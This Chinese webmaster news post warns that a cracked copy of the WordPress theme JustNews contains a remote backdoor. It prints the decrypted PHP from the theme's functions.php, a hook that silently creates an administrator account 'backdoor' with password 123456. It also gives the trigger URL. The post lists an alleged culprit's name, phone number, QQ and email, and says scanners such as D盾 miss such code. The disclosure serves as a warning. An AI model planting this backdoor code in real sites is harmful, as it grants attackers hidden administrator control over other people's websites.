[站长资讯] WordPress 主题JustNews破解版暗藏远程后门

JustNews免费版，JustNews破解版，JustNews免授权版，JustNews开心版，JustNews去授权版，JustNews去域名限制版，WordPress主题JustNews 破解版暗藏远程后门。JustNews主题专为博客、自媒体、资讯类的网站设计开发，自适应兼容手机、平板设备，支持前端用户中心，可以前端发布/投稿文章，同时主题支持专题功能，可以添加文章专题。

JustNews主题的functions.php文件解密后在48-61行发现后门代码

add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
    if (
        md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b'
    ) {
        require('wp-includes/registration.php');
        if (!username_exists('backdoor')) {
            $user_id = wp_create_user('backdoor', '123456');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

连backdoor这么明显的后门变量命名都不改。同样的配方，同样的味道。

使用http(s)://你的域名/?backdoor=go访问

自动创建用户名为backdoor密码为123456的管理员账户

远程把账号密码发送到此域名 www.hoonews.net

备案号：粤ICP备16112674号-3性质：个人名称：殷晓可

电话：15724087667

QQ：1010006358

邮箱：[email protected]

用破解版 JustNews主题 的诸位，D盾并不能扫描出像这种专门针对WordPress的后门

D盾对我而言其实主要用来检测加密文件和查杀低级的木马，高级一点的其实很容易绕过查杀。

所以不要以为用D盾扫一下发现没有报毒就万事无忧了，而且作者真的要针对盗版还是比较容易的。

比如justnews激活就会将域名发到http://www.wpcom.cn/authentication/

ripro会将设置域名之类的信息发到vip.ylit.cc。

之前不是说ripro盗版收款收到别人账户上去了吗？是盗版传播者做的，还是其他人做的？自己好好想想。